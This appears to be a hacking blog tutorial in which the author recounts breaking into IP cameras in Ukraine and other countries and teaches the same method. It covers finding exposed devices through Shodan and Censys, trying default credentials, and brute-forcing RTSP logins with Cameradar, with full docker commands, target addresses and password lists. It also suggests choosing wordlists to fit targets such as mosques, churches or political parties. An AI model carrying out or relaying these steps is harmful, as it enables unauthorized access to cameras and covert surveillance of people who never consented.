CyberMoransđ€
As you may know, we have played some OSINT roles for Ukraine since the invasion began. One of this roles is the hacking of IP cameras throughout the country. In this way, we can spy on Russian activities and war crimesâ ïž We did this at the request of the Ukraine Army starting in February 2022 đ
To hack these cameras we use multiple methods and techniquesđ In hacking, always explore multiple methods to be successful. -- Persistence is a key hacker đ trait --
As a hackerđ it is important to take a strategic approach to any target. Always use the simplest methods first before progressing to more advanced attack methodsđ
First step, we identified the unprotectedâ ïž cameras using such sites as Shodan, Google Dorks, and Censys. Then, we tried default credentials. These default credentials vary by camera and manufacturer but that technique resulted to pwning a few camerasđ
Next, we tried to hack the cameras with weak passwordsâ ïž. This produced way more successful results!đ The primary tool used is Cameradarđ
In this tutorial, I will show you how to use Cameradar for IP camera hacking just like we did!
đ Real Time Streaming Protocol: RTSP
RTSP is the protocol that most of these IP cameras use. Not all of the cameras use RTSP, but the vast majority do. Before proceeding, Note that those cameras using proprietary or other protocols will not be exploitable by cameradarđ
RTSP is an application-layer protocol used for commanding streaming media servers via pause and play capabilities. It thereby facilitates real-time control of the streaming media by communicating with the serverâșïž â without actually transmitting the data itself.
It is an application-level network communication system that transfers real-time data from multimedia to an endpoint device by communicating directly with the server streaming the datađ„
The protocol establishes and controls the media stream between client devices and servers by serving as a network remote control for time-synchronized streams of continuous media, such as audio and videođ
It does not stream the multimedia itself but communicates with the server that streams the multimedia datađ§ -- When a user pauses a video they are streaming, RTSP would convey the user's request to pause the video to the video streaming server-- âșïž
Like HTTP, RTSP uses TCP to maintain an end-to-end connection and, while most RTSP control messages are sent by the client to the server, some commands travel in the other directionđ
đ RTSP commands
Sent from the client to the server, when negotiating and controlling media transmissions:
đ Options: This request determines what other types of requests the media server will accept.
đ Describe: A describe request identifies the URL and type of data.
đ Announce: The announce method describes the presentation when sent from the client to the server and updates the description when sent from server to client.
đ Setup: Setup requests specify how a media stream must be transported before a play request is sent.
đ Play: A play request starts the media transmission by telling the server to start sending the data.
đ Pause: Pause requests temporarily halt the stream delivery.
đ Record: A record request initiates a media recording.
đ Teardown: This request terminates the session entirely and stops all media streams.
đ Redirect: Redirect requests inform the client that it must connect to another server by providing a new URL for the client to issue requests to.
Other types of RTSP requests include âget parameter,â âset parameter,â and âembedded binary data,â
Now, you are ready to start cracking IP cameras! đ
đ Download and Install cameradar
Cameradar can be run natively in Linux, but it works best in a docker container.
First, install docker đ
kali > sudo apt install dockerNext, start docker with the systemctl commandđ
kali > sudo systemctl start dockerNow, download cameradarđ
kali> sudo git clone https://github.com/Ullaakut/cameradar Now, lets brute-force some IP cameras! â
đ Run the RTSP Credential Brute-forcer
Now that you have docker and cameradar installed, you only need to point cameradar at the IP address of the camera that you want to brute-force! For instance, to brute force a camera at 192.168.1.1 , we would đ
kali > sudo docker run ullaakut/cameradar -t 192.168.1.101
Cameradar will now attempt to find a RTSP stream at one of the default RTSP ports namely 554, 5554 and 8554. If you suspect there may be other ports with RTSP streams --you may want to run an nmap scan first--, you can add them with the -p switch đ
kali > sudo docker run ullaakut/cameradar -t 192.168.1.101 -p 9554đ Use Custom Username & Password Lists
By default, cameradar uses a small username and password list of the most common usernames and passwords. It's good strategy to use these first but if they are unsuccessful, it's time to think out of the box!đ
This means larger and more appropriate username and password lists --I personally like seclists-- . However from experience hacking cameras in Ukraine, Mexico, Syria, Sudan and Russia, the usernames usually are simple đ€ such as admin, root, admin1, admin3, etc. This means that you can probably use the default username list but passwords do varyđ
That's why you should use a good password list that is appropriate for your environment and/or context of your target đ€--i.e, using a Spanish list in a Spanish speaking nation -- or the equivalent for a church, Mosque, Military, Political parties etc--đ
First, the password list MUSTđ€ be in json format. There are several websites that can covert your text file to json for free such as https://anyconv.com/txt-to-json-converter/. Your .txt file will then be converted to one with a json extension. So, if we were using the seclist's password list đ
/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txtI would first convert it to json format and then use that file with cameradar. It will then appear as 10-million-password-list-top-1000000.json. Now to use that password list with cameradar, you can run the command đ
kali> sudo docker run ullaakut/cameradar -t
-v /usr/share/seclists/Passwords/Common-Credentials:/tmp/dictionaries
-c "tmp/dictionaries/10-million-password-list-top-1000000.json"
-t 192.168.1.101
đ This is easier than it seems...
Once you become familiar with the RTSP protocol, password cracking of IP camera credentials follows a similar process as other remote password cracking techniques. In fact, it may even be easier since the RTSP protocol rarely imposes a lockout limit on the number of attempts made. With cameradar, we were able to gain access to a significant number of IP cameras that had weak passwordsđČ
đConclusion đ€
Subscribe to receive notifications of similar posts đ where we will be reverse engineering malware, vulnerabilities as well as hacking vectors, stories, tutorials and other Infosec stuff...đ
Follow me on twitter for daily Infosec Memes and shenanigansđ
Morans,
Thank you for taking time and hope you learned something new, Like and leave a comment/review and as always, stay awesome! đđ đȘ
Comments